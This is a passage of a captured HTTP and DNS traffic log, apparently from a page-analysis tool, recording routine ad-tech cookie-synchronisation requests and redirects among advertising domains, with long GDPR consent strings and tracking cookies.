AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /match/?int_id=19&google_error=3&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: onetag-sys.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 200

cache-control: no-transform, no-cache
p3p: CP='CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
set-cookie: OTP=97BuMkGTmKHAMYSzHR2ANvmtkbD_ifxHzAGg5KC4gxA; path=/; expires=Wed, 25 Jun 2025 18:25:21; domain=onetag-sys.com; SameSite=None; Secure;
content-length: 0
strict-transport-security: max-age=15552000
alt-svc: h3=":443"; ma=900, h3-29=":443"; ma=900
DNS

ssbsync-euw1.smartadserver.com

Request

ssbsync-euw1.smartadserver.com

IN AAAA

Response
DNS

match-eu-central-1-ecs.sharethrough.com

Request

match-eu-central-1-ecs.sharethrough.com

IN A

Response

match-eu-central-1-ecs.sharethrough.com

IN A

18.158.126.136

match-eu-central-1-ecs.sharethrough.com

IN A

18.195.126.233

match-eu-central-1-ecs.sharethrough.com

IN A

18.192.200.108

match-eu-central-1-ecs.sharethrough.com

IN A

18.158.171.68

match-eu-central-1-ecs.sharethrough.com

IN A

18.194.142.248

match-eu-central-1-ecs.sharethrough.com

IN A

18.159.229.46

match-eu-central-1-ecs.sharethrough.com

IN A

52.29.54.89

match-eu-central-1-ecs.sharethrough.com

IN A

3.67.74.124
GET

https://secure-assets.rubiconproject.com/utils/xapi/multi-sync.html?p=rise_engage&endpoint=eu

Request

GET /utils/xapi/multi-sync.html?p=rise_engage&endpoint=eu HTTP/2.0
host: secure-assets.rubiconproject.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://pbs-cs.yellowblue.io/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 301

server: AkamaiGHost
content-length: 0
location: https://eus.rubiconproject.com/usync.html?p=rise_engage&endpoint=eu
date: Sun, 26 May 2024 02:06:57 GMT
access-control-allow-credentials: true
access-control-allow-origin: *
DNS

imgsync-amsfpairbc.pubmnet.com

Request

imgsync-amsfpairbc.pubmnet.com

IN AAAA

Response
GET

https://contextual.media.net/cksync.php?cs=25&type=ris&ovsid=%7B%7BAPID%7D%7D&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&redirect=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11585%26id%3D%3Cvsid%3E

Request

GET /cksync.php?cs=25&type=ris&ovsid=%7B%7BAPID%7D%7D&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&redirect=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11585%26id%3D%3Cvsid%3E HTTP/2.0
host: contextual.media.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://pbs-cs.yellowblue.io/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 302

server: Apache
content-length: 154
content-type: text/html
location: https://cs.yellowblue.io/cs?aid=11585&id=3596908172093536000V10
set-cookie: visitor-id=3596908172093536000V10; Expires=Mon, 26 May 2025 02:06:57 GMT; domain=.media.net; Path=/; sameSite=none; secure=true
set-cookie: data-ris={{APID}}~~52;Expires=Mon, 26 May 2025 02:06:57 GMT;path=/;domain=.media.net; sameSite=none; secure=true
p3p: CP="NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA"
p3p: CP: NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA
p3p: CP: NON DSP COR NID CUR ADMa DEVo TAI PSA PSDo HIS OUR BUS COM NAV INT STA
strict-transport-security: max-age=31536000
alt-svc: h3=":443"; ma=93600
x-mnet-hl2: E
expires: Sun, 26 May 2024 02:06:57 GMT
cache-control: max-age=0, no-cache, no-store
pragma: no-cache
date: Sun, 26 May 2024 02:06:57 GMT
GET

https://ssbsync.smartadserver.com/api/sync?callerId=77&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /api/sync?callerId=77&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/1.1
Host: ssbsync.smartadserver.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://pbs-cs.yellowblue.io/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

Response

HTTP/1.1 302 Found

content-length: 0
date: Sun, 26 May 2024 02:06:56 GMT
location: https://cs.yellowblue.io/cs?aid=11600&id=6815578869837323924&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA
set-cookie: pid=6815578869837323924; expires=Thu, 26 Jun 2025 02:05:57 GMT; domain=smartadserver.com; path=/; secure; samesite=none
GET

https://image8.pubmatic.com/AdServer/ImgSync?p=160295&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&pu=https%3A%2F%2Fcs.yellowblue.io%2Fcs%3Faid%3D11576%26id%3D%23PMUID&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

